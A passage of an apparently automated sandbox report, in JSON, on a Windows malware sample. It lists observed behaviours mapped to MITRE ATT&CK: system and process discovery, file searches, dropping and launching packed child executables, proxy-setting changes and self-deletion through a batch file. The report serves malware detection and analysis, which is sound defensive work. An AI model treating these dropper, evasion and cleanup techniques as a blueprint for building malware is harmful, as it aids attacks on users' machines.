1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d0064c21200b344376b050000000000000000000000000000000000000000000000000000009c0100000000000000000000000000007cc91200f034509620c7120020c712005ecb86759c01000000000000005d84757cc912000e5d847514c51200dcaa8875010000000000000072000000ffffffffffffffff9cc212007802000000000000250000009cc212007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001fc57796f4c212006d82b376c46b2d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff210091002b000000620b867500000000606f260000000000500000007c222d000200000048b02800000000000100000838c62c0088732600380b867528c1120002000000e010000000002600b06b2d00f83b0000ff07000000002600000000007f070000c4002600302f26008620000008c2120067e5097700002600b06b2d000000000000002600000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e3c5779648c212006d82b376c46b2d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008bbc779660bb12006d82b376a46f2d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b0c7736fe09772ccc1200cc0126000000260000000000000000000f007301640200000000000000000000000000001800000010006a0164020000e8dc1100cccb120090cb1200000000008e000000e0cb1200feffffff68cb1200cf000d77d6000d773efe09778e00000047000000e0cb1200000000003ccb120095e10877 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000088212e0000000000c50900cc340000c0b0232e00e8732e0070042a00003b0000000026000000000088212e008ccd120004640c7738012600e0630c77daf80977000000000000260090212e006dd1bc76574878966cae9d760000000000000000d8bef276802100a1e8732e000100000000002600500126000c00000090212e000000000002000000180000002c00000068cd12000000000000000000030000002ccd12003c6e0c7700000000000000000000000048542800c075c4764854280000000000c075c47648cd120079dabc760000000002000000a0cd1200ff2b0c77 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000260012000000aa000000000000000000000080822c00506c2600b86d260078242d00687826007500630020be12002e00650028cb120078242d00e9e90c7778242d0000000000aa0000004cbf120084c3120000000000000000000000000000000000000000000000000020150000000026001c5c0b7760d81d75ffffffff17000000fcbe12002400000003000000ecc3120018c9120084c312008600000028bf120096ed0c779a242d00a06ae274860000004cbf120084c312000000000086008800a06ae2744cbf1200916ce2749a242d00a06ae274a06ae274bcc3120002020000 (UID: 00000000-00002180)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"IsWow64Process\" with parameter \"2180\" - (UID: 00000000-00002180)\n \"bucei.exe\" called \"IsWow64Process\" with parameter \"5888\" - (UID: 00000000-00005888)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"4204\" - (UID: 00000000-00004204)\n \"bytudy.exe\" called \"IsWow64Process\" with parameter \"3640\" - (UID: 00000000-00003640)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"bucei.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"bytudy.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"syzoe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"syzoe.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"syzoe.exe\" called \"EnumWindows\" with parameter \"1241160\" - (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"bucei.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"bytudy.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter bucei.exe (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00002180)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"syzoe.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"184617021\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"syzoe.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"620824521\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"syzoe.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"184617021\"\n \"cx\": \"0\"\n \"cy\": \"21\"}\n \"syzoe.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"620824521\"\n \"cx\": \"320\"\n \"cy\": \"30\"}\n \"syzoe.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"184617021\"\n \"cx\": \"132\"\n \"cy\": \"30\"}\n \"syzoe.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"167839828\"\n \"cx\": \"16\"\n \"cy\": \"16\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bucei.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bytudy.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"syzoe.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.960483709149519", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" opened \"\\Device\\KsecDD\"\n \"bucei.exe\" opened \"\\Device\\KsecDD\"\n \"bytudy.exe\" opened \"\\Device\\KsecDD\"\n \"syzoe.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"bytudy.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"bucei.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"bucei.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"bucei.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"bucei.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" with delete access\n \"cmd.exe\" opened \"C:\\\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an entrypoint in section \".Jk)\"\n \"syzoe.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" wrote 24576 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"bytudy.exe\" wrote 11918 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\syzoe.exe\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ff10000e1fff09ff21ff014cff21ffff546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a24370000000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"syzoe.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\syzoe.exe]- [targetUID: 00000000-00003640]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has section name .Jk) with entropy \"7.96981994995\"\n \"syzoe.exe\" has section name UPX1 with entropy \"7.99923984807\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"syzoe.exe\" has a section named \"UPX0\"\n \"syzoe.exe\" has a section named \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\syzoe.exe\" has high entropy 7.987289815724712", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"bucei.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"bucei.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"bytudy.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"bytudy.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\bucei.exe (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\_vslite.bat (UID: 00000000-00002180)\n \"bucei.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\bytudy.exe (UID: 00000000-00005888)\n \"bytudy.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\syzoe.exe (UID: 00000000-00003640)\n \"bytudy.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\_vslite.bat (UID: 00000000-00003640)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": 